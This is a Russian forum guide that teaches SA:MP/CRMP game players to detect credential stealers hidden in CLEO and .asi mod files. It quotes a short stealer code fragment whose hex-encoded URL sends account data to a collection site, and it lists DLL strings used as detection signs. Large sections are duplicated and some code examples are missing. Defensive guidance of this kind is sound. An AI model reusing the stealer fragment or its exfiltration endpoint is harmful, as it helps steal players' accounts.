Самый распространённый способ - это проверка через программу "Wireshark"
Программу можно скачать с официального сайта - сайт
Как проверить .cs-файл на стиллеры?
В последней версии cleo-библиотеки идут дополнительные программы , одна из них называется Sunny Builder - то что нам нужно.
1. При установки сleo-библиотеки , поставить галочку на установку билдера.
2. Открываем программу , в верхней части панели нажимаем "Файл" --> "Открыть".
Указываем на сам файл , который будем проверять. ( В типе файлов выбрать формат "Скомпилированные скрипты" )
3. Открываем наш скрипт. ( Откроется его код )
4. После открытия кода , жмём горячие клавиши "Ctrl+F". Появляется окно ввода. В графе "Искать" вводим слово "Stealer"
5. Если поиск находит запрошенное слово, значит в коде есть стиллер.
Поспешите удалить этот файл!
Пример кода стиллера :
Код:
0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url
hex
"http:" 2f 2f "candyquendy.hol.es" 2f "acci" 2f "add.php?" 00
end@stealer_by_mg 0 1@ - - сам разработчик стиллера.
candyquendy.hol.es - сайт , куда отправляют данные об аккаунте.
Так же , есть второй способ проверить файл на стиллер.
Есть скрипт "steal_logger.asi" - с его помощью и будем проверять.
В кратце объясню , как им пользоваться :
1. Суём в папку с игрой.
2. Заходим на любой сервер SA:MP - CRMP , под любым ником.
3. Придумываем любой пароль , авторизовываемся и сворачиваем игру.
4. В папке должен создаться текстовый файл (.txt формата). Нажимаем на него , и в тексте ищем строчку с IP нашего сервера и паролем от только что зарегистрированного аккаунта. Нашли - значит эти данные уже у взломщика.
Пускай радуется , когда зайдёт за бича поиграть.
А мы в это время удаляем последний cleo-файл.
Внимание!
Как проверить .asi-файл на стиллеры?
Самое лёгкое позади. Теперь учимся проверять .asi-файлы. Множество модификаций \ фиксов связанно именно с этим форматом. В нём "Wireshark" стиллер не видит. Что же делать? Выложу пару наиболее известных способов.
Наиболее эффективный способ проверки. Проверка через программу "lElnspector HTTP Analyzer"
1. Качаем программу с официального сайта - сайт .
2. Кидаем .asi , который хотим проверить, в папку с игрой.
3. Врубаем программу, запускаем SA:MP - CRMP. ( Не вздумайте проверять с основы! )
4. Заходим на сервер, вылезло окно авторизации. Не вводим пароль, а сворачиваем игру!
5. Разворачиваем программу, и жмём в левом верхнем углу "Start" (Или F9 по горячей клавише).
6. Разворачиваем SA:MP - СRMP , вводим в окно пароль "pocelyimenyavzad". Авторизуемся , вызываем полицию "мне в туалет" , и оффаемся /q.
7. Разворачиваем "IEInspector HTTP Analyzer" и смотрим лог самого анализа. Если анализер что-то нашёл - значит есть стиллер.
Удаляем .asi файл со стиллером.
И играем дальше!
Второй способ - проверка кода блокнотом.
1. Открываем .asi через Блокнот.
2. Смотрим код.
Пример чистого когда ( Нет стиллера ) :
Пример кода со стиллером ( Не kernel.dll )
Обращаем внимание на последние строчки.
Дополнительная информация :
ВНИМАНИЕ!
У Namalsk`a прекрасный лаунчер и советую играть Вам с него , ссылка на скачивание лаунчера - тык .
Играйте с лаунчера , что бы Ваш аккаунт был наверняка в безопасности!
candyquendy.hol.es - сайт , куда отправляют данные об аккаунте.
Так же , есть второй способ проверить файл на стиллер.
Есть скрипт "steal_logger.asi" - с его помощью и будем проверять.
В кратце объясню , как им пользоваться :
1. Суём в папку с игрой.
2. Заходим на любой сервер SA:MP - CRMP , под любым ником.
3. Придумываем любой пароль , авторизовываемся и сворачиваем игру.
4. В папке должен создаться текстовый файл (.txt формата). Нажимаем на него , и в тексте ищем строчку с IP нашего сервера и паролем от только что зарегистрированного аккаунта. Нашли - значит эти данные уже у взломщика.
Пускай радуется , когда зайдёт за бича поиграть.
А мы в это время удаляем последний cleo-файл.
Внимание!
Код:
В качестве проверки использовать только новосозданные аккаунты, не заходите на свои основные аккаунты с этим скриптом. После проверки удалить \ или сделать отдельную копию GTA для проверок скриптов.Самое лёгкое позади. Теперь учимся проверять .asi-файлы. Множество модификаций \ фиксов связанно именно с этим форматом. В нём "Wireshark" стиллер не видит. Что же делать? Выложу пару наиболее известных способов.
Наиболее эффективный способ проверки. Проверка через программу "lElnspector HTTP Analyzer"
1. Качаем программу с официального сайта - сайт .
2. Кидаем .asi , который хотим проверить, в папку с игрой.
3. Врубаем программу, запускаем SA:MP - CRMP. ( Не вздумайте проверять с основы! )
4. Заходим на сервер, вылезло окно авторизации. Не вводим пароль, а сворачиваем игру!
5. Разворачиваем программу, и жмём в левом верхнем углу "Start" (Или F9 по горячей клавише).
6. Разворачиваем SA:MP - СRMP , вводим в окно пароль "pocelyimenyavzad". Авторизуемся , вызываем полицию "мне в туалет" , и оффаемся /q.
7. Разворачиваем "IEInspector HTTP Analyzer" и смотрим лог самого анализа. Если анализер что-то нашёл - значит есть стиллер.
Удаляем .asi файл со стиллером.
И играем дальше!
Второй способ - проверка кода блокнотом.
1. Открываем .asi через Блокнот.
2. Смотрим код.
Пример чистого когда ( Нет стиллера ) :
Пример кода со стиллером ( Не kernel.dll )
Обращаем внимание на последние строчки.
Дополнительная информация :
Код:
Ещё один вариант скрытого стиллера - названия в тексте "urlmon.dll", "wininet.dll", "wsock32.dll" в самом коде. Либо строчка "kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR"У Namalsk`a прекрасный лаунчер и советую играть Вам с него , ссылка на скачивание лаунчера - тык .
Играйте с лаунчера , что бы Ваш аккаунт был наверняка в безопасности!
Источник скриншотов и помощь в оформлении темы - Danni Winchester
